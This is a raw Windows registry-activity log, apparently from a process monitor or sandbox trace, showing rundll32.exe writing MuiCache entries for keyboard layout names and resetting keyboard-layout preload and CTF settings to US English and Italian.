HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5037
Romanian (Legacy)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5055
Russian
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5030
Croatian
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5039
Slovak
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5029
Albanian
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5022
Swedish
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5079
Thai Kedmanee
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5060
Turkish Q
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5129
Urdu
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5058
Ukrainian
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5052
Belarusian
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5041
Slovenian
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5042
Estonian
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5043
Latvian
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5045
Lithuanian IBM
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5151
Tajik
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5124
Persian
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5118
Vietnamese
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5120
Armenian Eastern
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5117
Azeri Latin
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5163
Sorbian Standard (Legacy)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5109
Macedonian (FYROM)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5191
Setswana
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5119
Georgian
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5108
Faeroese
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5096
Devanagari - INSCRIPT
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5140
Maltese 47-Key
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5138
Norwegian with Sami
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5113
Kazakh
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5128
Kyrgyz Cyrillic
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5150
Turkmen
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5116
Tatar
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5135
Bengali
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5101
Punjabi
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5097
Gujarati
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5100
Oriya
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5102
Tamil
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5103
Telugu
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5098
Kannada
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5139
Malayalam
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5177
Assamese - INSCRIPT
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5104
Marathi
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5127
Mongolian Cyrillic
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5154
Tibetan (PRC)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5145
United Kingdom Extended
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5161
Khmer
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5162
Lao
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5130
Syriac
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5166
Sinhala
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5169
Nepali
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5159
Pashto (Afghanistan)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5132
Divehi Phonetic
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5187
Hausa
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5189
Yoruba
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5186
Sesotho sa Leboa
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5148
Bashkir
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5168
Luxembourgish
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5170
Greenlandic
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5188
Igbo
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5165
Uyghur (Legacy)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5146
Maori
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5160
Yakut
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5190
Wolof
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5072
Chinese (Simplified) - US Keyboard
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5024
Swiss German
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5025
United Kingdom
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5017
Latin American
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5002
Belgian French
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5001
Belgian (Period)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5019
Portuguese
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5038
Serbian (Latin)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5115
Azeri Cyrillic
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5144
Swedish with Sami
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5114
Uzbek Cyrillic
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5158
Mongolian (Mongolian Script)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5156
Inuktitut - Latin
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5192
Chinese (Traditional, Hong Kong S.A.R.) - US Keyboard
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5005
Canadian French (Legacy)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5057
Serbian (Cyrillic)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5193
Chinese (Simplified, Singapore) - US Keyboard
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5004
Canadian French
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5023
Swiss French
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5194
Chinese (Traditional, Macao S.A.R.) - US Keyboard
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5014
Irish
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5155
Bosnian (Cyrillic)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5085
Arabic (102)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5054
Bulgarian (Latin)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5032
Czech (QWERTY)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5012
German (IBM)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5048
Greek (220)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5092
United States-Dvorak
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5021
Spanish Variation
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5034
Hungarian 101-key
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5016
Italian (142)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5036
Polish (214)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5126
Portuguese (Brazilian ABNT2)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5175
Romanian (Standard)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5056
Russian (Typewriter)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5040
Slovak (QWERTY)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5080
Thai Pattachote
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5059
Turkish F
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5044
Latvian (QWERTY)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5088
Lithuanian
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5121
Armenian Western
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5164
Sorbian Extended
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5174
Macedonian (FYROM) - Standard
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5182
Georgian (QWERTY)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5105
Hindi Traditional
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5141
Maltese 48-Key
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5143
Sami Extended Norway
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5136
Bengali - INSCRIPT (Legacy)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5131
Syriac Phonetic
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5167
Sinhala - Wij 9
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5171
Inuktitut - Naqittaut
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5133
Divehi Typewriter
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5185
Uyghur
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5089
Belgian (Comma)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5137
Finnish with Sami
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5110
Canadian Multilingual Standard
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5125
Gaelic
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5086
Arabic (102) AZERTY
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5173
Bulgarian (Phonetic)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5087
Czech Programmers
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5049
Greek (319)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5026
United States-International
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5176
Romanian (Programmers)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5081
Thai Kedmanee (non-ShiftLock)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5179
Ukrainian (Enhanced)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5172
Lithuanian Standard
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5184
Sorbian Standard
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5181
Georgian (Ergonomic)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5178
Bengali - INSCRIPT
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5142
Sami Extended Finland-Sweden
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5180
Bulgarian
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5050
Greek (220) Latin
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5027
United States-Dvorak for left hand
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5082
Thai Pattachote (non-ShiftLock)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5195
Bulgarian (Phonetic Traditional)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5051
Greek (319) Latin
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5028
United States-Dvorak for right hand
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5047
Greek Latin
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5123
US English Table for IBM Arabic 238_L
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5122
Greek Polytonic
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\system32\input.dll,-5183
Microsoft IME
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5149
Chinese (Traditional) - New Quick
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5067
Chinese (Traditional) - ChangJie
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5111
Chinese (Traditional) - Quick
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5066
Chinese (Traditional) - Phonetic
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5090
Chinese (Traditional) - New Phonetic
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5093
Chinese (Traditional) - New ChangJie
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5091
Chinese (Simplified) - Microsoft Pinyin New Experience Input Style
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\SYSTEM32\input.dll,-5076
Chinese (Simplified) - Microsoft Pinyin ABC Input Style
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll,-90
Tablet PC Correction
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5183
Microsoft IME
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Windows\IME\SpTip.DLL,-102
Speech Recognition
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-10
Chinese Traditional DaYi (version 6.0)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-11
Chinese Traditional Array (version 6.0)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-17
Amharic Input Method (version 1.0)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-16
Yi Input Method (version 1.0)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-12
Chinese Simplified QuanPin (version 6.0)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-14
Chinese Simplified ZhengMa (version 6.0)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-13
Chinese Simplified ShuangPin (version 6.0)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll,-91
Tablet PC Text Insertion
3296
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
3296
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409
3296
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language
3296
rundll32.exe
write
HKEY_CURRENT_USER\Keyboard Layout\Preload
2
00000409
3296
rundll32.exe
write
HKEY_CURRENT_USER\Keyboard Layout\Preload
1
00000410
3296
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Default
{00000000-0000-0000-0000-000000000000}
3296
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Profile
{00000000-0000-0000-0000-000000000000}
3296
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
KeyboardLayout
67699721
3296
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Default
{00000000-0000-0000-0000-000000000000}
3296
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Profile
{00000000-0000-0000-0000-000000000000}
3296
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
KeyboardLayout
68158480
3296
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language
00000000
00000409
3296
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language
00000001
00000410
3296
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
CLSID
{00000000-0000-0000-0000-000000000000}
3296
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
Profile
{00000000-0000-0000-0000-000000000000}
3296
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
KeyboardLayout
67699721
3296
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
CLSID
{00000000-0000-0000-0000-000000000000}
3296
rundll32.exe
write
